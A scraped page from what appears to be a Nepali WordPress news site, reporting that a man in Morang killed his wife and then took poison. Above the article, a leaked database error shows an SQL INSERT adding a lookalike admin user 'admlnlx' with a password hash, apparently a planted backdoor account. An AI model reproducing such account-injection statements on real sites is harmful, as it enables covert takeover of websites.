WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUC23q3hm3bOwl78Y.cDWon0onLrmv.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 08:12:23', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
श्रीमतीको हत्या गरी विष सेवन – Gaule Khabar

श्रीमतीको हत्या गरी विष सेवन

श्रीमतीको हत्या गरी विष सेवन

विराटनगरमाघ २७-

मोरङको सिजुवामा एक युवकले धारिलो हतियार प्रहार गरी आफ्नी श्रीमतीको हत्या गरेका छन् ।

मादक पदार्थ सेवन गरेका स्थानीय उदय सुतिहारले हिजो साँझ बासिलाले प्रहार गरेको प्रहरीले जनाएको छ । गम्भीर घाइते भएकी उनकी श्रीमती शान्ता सुतिहारको उपचारका क्रममा रंगेलीस्थित अस्पतालमा मृत्यु भएको थियो । घटनापछि ती युवकले विष सेवन गरेका थिए । उनको विराटनगरस्थित कोसी अञ्चल अस्पतालमा उपचार भइरहेको प्रहरीले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका